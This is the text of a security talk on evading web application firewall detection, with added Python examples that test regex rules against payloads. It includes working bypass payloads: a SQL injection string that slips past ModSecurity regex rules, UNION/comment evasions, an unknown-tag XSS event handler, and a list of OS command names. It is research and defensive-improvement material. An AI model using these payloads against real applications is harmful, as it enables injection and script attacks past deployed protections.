Web Application Firewalls: Attacking detection logic
mechanisms
Vladimir Ivanov @httpsonly
/whoam/i
MSc Information Security (merit), RHUL (UK)
Web application penetration tester at Positive Technologies (ptsecurity.com)
Agenda
1. Introduction
2. Detection logic in WAF
3. METHOD I: Syntax bypass
4. METHOD II: Logical bypass
5. METHOD III: Unexpected by primary logic bypass
6. Takeaways
Motivation
The Standoff:
1. Attackers: a mix of various techniques, rarely understanding the root cause.
2. Defenders: WAFs protect against automated testing, and every vendor implements additional functionality.
Result: no careful whitebox analysis.
WAF workflow example
Stage 1: Parse HTTP(S) packet from client
Stage 2: Choose rule set depending on type of incoming parameter
Stage 3: Normalise data
Stage 4: Apply detection logic
Stage 5: Make detection decision
WAF workflow: Detection logic
Regular expressions: OWASP CRS 2, OWASP CRS 3dev, OWASP CRS 3rc, PHPIDS, Comodo rules, QuickDefenceWaf, Vultureproject, Waf.red, ShadowD, etc.
Tokenizer: libinjection
Reputation: repsheet
Score builder: NAXSI
Anomaly detection: HMM
Regular expression: a sequence of characters that defines a search pattern.
(?i)(<script[^>]*>.*?)
Annotated parts: 1 = (?i), the case-insensitive flag; 2 = <script[^>]*>, the opening tag with any attributes; 3 = .*?, a lazy match of whatever follows.
Sources: 500+ regular expressions
• OWASP CRS2 (modsecurity)
• OWASP CRS3dev (modsecurity)
• OWASP CRS3rc1 (modsecurity)
• PHPIDS
• Comodo WAF
• QuickDefense
Rule categories (pie chart): XSS and SQL roughly 43% each (43.3% and 43.8%); other (LFI/RFI, PHP, OS exec, etc.) 12.8%.
Results
300+ potential bypasses
Most "vulnerable": PHPIDS (E = 1.15)
Least "vulnerable": Comodo WAF (E = 0.32)
Most "exploitable": OWASP CRS3-rc (E = 0.89)
E = potential bypasses / total rules
METHOD I: Syntax bypass of regular expressions
Enumerate all possible and invent all impossible mistakes
What's wrong with regexp? Level: Easy
1. No (?i) flag: atTacKpAyloAd (case variation)
2. ^ $ anchors: attackpayload (matched only when it is the whole value, not when embedded in other data)
3. Bounded repetition {1,3}: attackpayloadattackpayloadattackpayloadattackpa… (more repetitions than the quantifier allows)
What's wrong with regexp? Level: Medium
1. ReDoS
2. Repetitions: + *
3. Blacklisting wildcards in a set
What's wrong with regexp? Level: Advanced
1. Non-standard ranges
2. POSIX character classes
3. Operators
4. Backreferences, wildcards
Regular expressions: Security cheatsheet
Two parts: a theoretical "whitepaper" and practical "code".
Hack regular expressions with regular expressions!
+ SAST: assists with whitebox analysis of regular expressions in the source code of your projects
+ Low false positives: focused on finding high-severity security issues
+ Open source on GitHub!
- Does not analyze regular expressions dynamically (yet).
https://github.com/attackercan/REGEXP-SECURITY-CHEATSHEET
Target audience
Not only WAFs use regexp detection logic:
• XSS Auditors
• Backend parsers
• Front-end analyzers
Developers, security auditors, bug hunters
DEMO: Regex Security Cheatsheet
^(?:ht|f)tps?://(.*)$
Comodo WAF: Att4ck is bl0cked!
(\bunion[\s\\*\/]{1,100}?\bselect\b)
QuickDefense WAF: Attackers are lazy enough
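Added example (not part of the deck) for the "Level: Easy" mistakes and for the QuickDefense rule quoted above: each rule is run against a payload written the way the rule expects and against a variant the same backend would still execute. The attackpayload rules are constructed stand-ins; the QuickDefense pattern is the one on the slide, compiled case-insensitively, which is an assumption since the slide shows no flags.

```python
import re

# Constructed rules modelled on the "Level: Easy" slides, plus the QuickDefense
# rule quoted in the deck (flags assumed: the slide shows only the pattern).
RULES = {
    "no (?i) flag":       re.compile(r"attackpayload"),
    "^ $ anchors":        re.compile(r"^(?i:attackpayload)$"),
    "bounded {1,3}":      re.compile(r"^(?i:attackpayload){1,3}$"),
    "QuickDefense union": re.compile(r"(\bunion[\s\\*\/]{1,100}?\bselect\b)", re.I),
}

# Constructed payloads: each list starts with the form the rule was written for,
# followed by variants that the backend would treat the same way (MySQL accepts
# any amount of whitespace or comment between UNION and SELECT).
PAYLOADS = {
    "no (?i) flag":       ["attackpayload", "atTacKpAyloAd"],
    "^ $ anchors":        ["attackpayload", "x=attackpayload&y=1"],
    "bounded {1,3}":      ["attackpayload" * 3, "attackpayload" * 4],
    "QuickDefense union": ["union select", "union/**/select",
                           "union" + " " * 101 + "select"],
}


def bypasses(rule, payloads):
    """Return the payloads the rule fails to match: the bypass candidates."""
    return [p for p in payloads if rule.search(p) is None]


def report():
    """Bypass candidates per rule, for every rule/payload pair above."""
    return {name: bypasses(RULES[name], PAYLOADS[name]) for name in RULES}


if __name__ == "__main__":
    for name, missed in report().items():
        print(f"{name:20s} missed: {missed!r}")
```

The lazy `{1,100}?` in the QuickDefense rule does not help: lazy or greedy, the quantifier gives up at 100 characters, and the 101st space costs the attacker nothing.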
JavaScript checker in real-life web app
We can cause ReDoS on the client side by supplying a specially crafted email as input.
But what if the backend also uses the same regex for checking?
EdgeHTML.dll: IE+Edge XSS Auditor
Result: blocked
Regexp bypass. Result: alert!
Thx @ahack_ru for the payload
(?:div|like|between|and|not )\s+\w)
Note the literal space inside "not " followed by \s+: "not" has to be followed by at least two whitespace characters, so "not x" with a single space is never matched.
https://github.com/PHPIDS/PHPIDS/commit/667e63af93e8fd2ee4df99dd98cb41acdf480906
What's next?
1. Identify WAF vendor and version using "signature" vulnerabilities.
2. Reveal and apply bypasses depending on the situation.
3. Craft a string which bypasses all regexp-based rules.
ModSecurity SQLi bypass
Basic SQLi is given:
All-SQLi-regexp bypass:
-1'OR#foo
id=IF#foo
(ASCII#foo
((SELECT-version()/1.))<250,1,0) #
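Added example illustrating why a payload in the style above slips past keyword-adjacency rules, and what the WAF's normalisation stage (stage 3 of the workflow) would have to do about it. The payload and both rules are constructed for the illustration; the rules are not actual CRS rules.

```python
import re

# Constructed payload in the style of the slide: every keyword is followed by a
# MySQL '#' comment, so two keywords are never separated by plain whitespace.
RAW = "-1'OR#foo\nIF#foo\n(ASCII#foo\n((SELECT-version()/1.))<250,1,0) #"

# Two constructed keyword-adjacency rules (illustrative, not real CRS rules):
# a boolean operator followed by a function-like token, and IF( ... SELECT.
RULES = {
    "or/and followed by a call": re.compile(r"\b(?:or|and)\s+\w+\s*\(", re.I),
    "if( ... select":            re.compile(r"\bif\s*\(.*?\bselect\b", re.I | re.S),
}


def normalise_mysql(sql):
    """Replace MySQL comments by a space before the rules run.

    MySQL executes the body of /*!NNNNN ... */ versioned comments, so that body
    is kept rather than dropped; '#' and '-- ' comments run to end of line.
    The dialect matters: '#' is not a comment in PostgreSQL, so a PostgreSQL
    backend needs a different normaliser.
    """
    sql = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", sql, flags=re.S)   # keep executable body
    sql = re.sub(r"/\*.*?\*/", " ", sql, flags=re.S)            # ordinary block comments
    sql = re.sub(r"(?:#|--[ \t]).*", " ", sql)                  # '.' stops at the newline
    return sql


def detect(value, rules=RULES):
    """Return {rule name: (matched on raw input, matched after normalisation)}."""
    norm = normalise_mysql(value)
    return {name: (r.search(value) is not None, r.search(norm) is not None)
            for name, r in rules.items()}


if __name__ == "__main__":
    print(repr(normalise_mysql(RAW)))
    for name, (before, after) in detect(RAW).items():
        print(f"{name:28s} raw: {before}  normalised: {after}")
```

Both rules miss the raw value and hit the normalised one, which is the general lesson of the slide: a regexp rule set is only as good as the normalisation in front of it, and that normalisation has to model the backend's lexer, not the rule author's idea of SQL.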
What's next? (continued)
4. …
5. Dig deeper!
METHOD II: Logical bypass (manual review analysis)
+ Non-standard findings
- Subjective
Blacklists fail #1
https://github.com/netty/netty/issues/5535
Blacklists fail #2, 3, 4, …
NAXSI: 0x is on the list; 0b10101 and b'10101' are equivalent binary literals
ModSecurity 2.2.9, XSS rule 973300: <(a|abbr|acronym|... versus <non_existing_tag onmouseover=alert(1)>hover this!
ModSecurity 3RC-1, OS-Commands.data: adduser / useradd, ipconfig / ifconfig, copy, move / cp, mv
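Added example for the blacklist failures above: the three cases reduced to one check, "does every input the backend treats the same way hit the list?". All lists here are constructed stand-ins, not the real NAXSI rule, rule 973300 or OS-Commands.data contents.

```python
import re


def gaps(is_listed, equivalents):
    """Inputs the backend treats alike that the blacklist does not catch."""
    return [e for e in equivalents if not is_listed(e)]


# 1. Literal syntax. A hex-literal signature versus MySQL's other spellings of
#    the same value: 0x15, 0b10101 and b'10101' are all 21 in numeric context.
HEX_LITERAL = re.compile(r"\b0x[0-9a-f]+", re.I)
MYSQL_21 = ["0x15", "0b10101", "b'10101'"]

# 2. Tag names. A shortened, constructed tag list versus the behaviour that
#    matters: an event-handler attribute, which any tag name can carry because
#    the HTML parser still creates an element for an unknown name.
TAG_LIST = re.compile(r"<(?:a|abbr|acronym|address|applet|area|b|div|img|script)\b[^>]*>", re.I)
EVENT_HANDLER = re.compile(r"<[a-z][\w:-]*[^>]*\son[a-z]+\s*=", re.I)
XSS_VARIANTS = ["<img src=x onerror=alert(1)>",
                "<non_existing_tag onmouseover=alert(1)>hover this!"]

# 3. Command names. A constructed, incomplete command list versus the pairs
#    the slide shows (Windows / Unix spellings of the same action).
COMMAND_LIST = {"adduser", "ifconfig", "copy", "move"}
COMMAND_PAIRS = [("adduser", "useradd"), ("ipconfig", "ifconfig"),
                 ("copy", "cp"), ("move", "mv")]


def literal_gaps():
    return gaps(lambda s: HEX_LITERAL.search(s) is not None, MYSQL_21)


def tag_list_gaps():
    return gaps(lambda s: TAG_LIST.search(s) is not None, XSS_VARIANTS)


def event_handler_gaps():
    return gaps(lambda s: EVENT_HANDLER.search(s) is not None, XSS_VARIANTS)


def command_gaps():
    return gaps(lambda c: c in COMMAND_LIST,
                [c for pair in COMMAND_PAIRS for c in pair])


if __name__ == "__main__":
    print("literals missed:      ", literal_gaps())
    print("tag list missed:      ", tag_list_gaps())
    print("event-handler missed: ", event_handler_gaps())
    print("commands missed:      ", command_gaps())
```

The tag list and the event-handler check differ in kind, not in length: the first enumerates names and is wrong the moment the browser accepts a name it lacks, the second keys on the behaviour the attacker needs (an attribute that runs script), so an unknown tag adds nothing to bypass.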
Research successes: @mazen160
METHOD III: Unexpected by primary logic bypass
XSS Fuzzer
libinjection
https://github.com/attackercan/CPP-SQL-FUZZER
• Receive SQL query as input
• Fuzz it (mysql.h, SQLAPI.h, ODBC?)
• Record every query except syntax errors
• Parse output!
• Current mysql.h performance: 21M symbols in <1 hour; speed = 9k queries per second (QPS)
• Up to 1.6M QPS!
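Added example of the fuzzer idea above on a backend that ships with Python; it is not the deck's CPP-SQL-FUZZER. That tool drives MySQL through mysql.h; this stand-in uses the built-in sqlite3 module so it runs offline, which also shows why the classified tables are per backend: '#' is a comment in MySQL but an illegal token in SQLite. The template, the candidate list and the whitespace rule are constructed for the example.

```python
import re
import sqlite3

# Fuzz what the backend accepts between a keyword and a literal. The template
# and the candidate list are this example's choices, not the deck's.
TEMPLATE = "SELECT{sep}1"


def candidates():
    """Every single ASCII byte (NUL excluded) plus a few multi-character separators."""
    singles = [chr(b) for b in range(1, 128)]
    multis = ["/**/", "--\n", "#\n", "/*!*/"]
    return singles + multis


def fuzz_separators(conn=None):
    """Run the template with every candidate and keep those the parser does not
    reject (the deck's 'record every query except syntax errors'), with the
    value the query returned so the result can be inspected afterwards."""
    if conn is None:
        conn = sqlite3.connect(":memory:")
    accepted = {}
    for sep in candidates():
        try:
            row = conn.execute(TEMPLATE.format(sep=sep)).fetchone()
        except Exception:        # syntax error, illegal token, unbound ?1/@1/:1, NUL, ...
            continue
        accepted[sep] = row[0]
    return accepted


# What a typical 'select\s+...' rule assumes separates two tokens.
SEPARATOR_RULE = re.compile(r"\s+")


def classify(conn=None):
    """Split accepted separators into whitespace (what the rule expects) and the
    rest: tokens the backend accepts that a \\s+ rule would not treat as a gap."""
    accepted = fuzz_separators(conn)
    expected = [s for s in accepted if SEPARATOR_RULE.fullmatch(s)]
    unexpected = [s for s in accepted if not SEPARATOR_RULE.fullmatch(s)]
    return expected, unexpected


if __name__ == "__main__":
    expected, unexpected = classify()
    print("whitespace separators:", [repr(s) for s in expected])
    print("accepted by SQLite but not by \\s+:", [repr(s) for s in unexpected])
```

The second list is the interesting one: `SELECT+1`, `SELECT-1` and `SELECT/**/1` all parse, so a rule that joins `select` to the next token with `\s+` has a gap for every entry in it. Repeat the run against the real backend (MySQL through mysql.h, as the deck does) before trusting the table, since the accepted set is a property of that lexer.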
SQL fuzzer
SQL fuzzer: Examples
SQL Fuzzer: Results
Contribution
• Regexp security cheatsheet + SAST
• Blacklist improvement
• SQL Fuzzer: Classified tables
https://github.com/attackercan
TODO
1. Update Regular Expression Security Cheatsheet
2. Create regular expression Dynamic analysis tool
3. “Clever fuzzing” + scalable (MySQL allows 1.6M QPS)
Questions?
Thank you
Arseniy Sharoglazov <[email protected]> (Contribution to Regex Security Cheatsheet)
Dmitry Serebryannikov @dsrbr (Contribution to SQL fuzzer)
Andrey Evlanin @xpathmaster
All @ptsecurity team ;)